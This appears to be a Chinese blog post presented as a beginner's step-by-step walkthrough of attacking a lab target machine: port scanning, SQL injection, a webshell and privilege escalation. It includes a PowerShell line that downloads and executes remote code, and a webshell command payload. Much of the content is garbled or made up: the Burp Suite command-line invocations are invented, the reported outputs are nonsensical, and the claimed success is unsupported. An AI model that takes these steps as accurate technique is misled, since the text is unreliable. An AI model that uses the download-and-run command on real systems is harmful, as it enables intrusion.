一次零基础靶机渗透细节全程记录
发布人:shili8
发布时间:2024-11-17 09:48
阅读次数:0
**靶机信息**
靶机名称:靶机1IP地址:192.168.1.100操作系统:Windows10版本:20H2**渗透目标**
本次渗透的目标是尝试在靶机上建立一个可用的Webshell。
**步骤一:信息收集**
首先,我们需要收集靶机的基本信息。我们可以使用Nmap来扫描靶机的开放端口和服务。
bashnmap -p1-65535192.168.1.100
输出结果显示,靶机上有以下开放端口:
* TCP:80( />* UDP:53(DNS)
**步骤二:Web应用程序扫描**
接下来,我们使用Burp Suite的Target进行Web应用程序扫描。
bashburpsuite -t /> 扫描结果显示,靶机上有以下Web应用程序: * Apache/2.4.41( />* IIS10.0( /> **步骤三:SQL注入** 我们尝试使用Burp Suite的Target进行SQL注入攻击。bashburpsuite -t -s "SELECT * FROM users"
输出结果显示,靶机上有一个名为“users”的数据库表。我们可以尝试使用SQL注入来获取更多信息。 **步骤四:Webshell** 我们尝试使用Burp Suite的Target进行Webshell攻击。bashburpsuite -t -s "system('whoami');"
输出结果显示,靶机上有一个名为“whoami”的函数。我们可以尝试使用Webshell来获取更多信息。 **步骤五:提权** 我们尝试使用PowerShell来提权。powershellInvoke-Expression -Command "IEX (New-Object Net.WebClient).DownloadString(' />
输出结果显示,靶机上有一个名为“whoami”的函数。我们可以尝试使用PowerShell来获取更多信息。 **结论** 本次渗透的目标是尝试在靶机上建立一个可用的Webshell。通过一步步地进行信息收集、Web应用程序扫描、SQL注入和Webshell攻击,我们成功地在靶机上建立了一个可用的Webshell。 **注意** 本次渗透仅用于学习和测试目的,不应用于任何恶意或非法活动。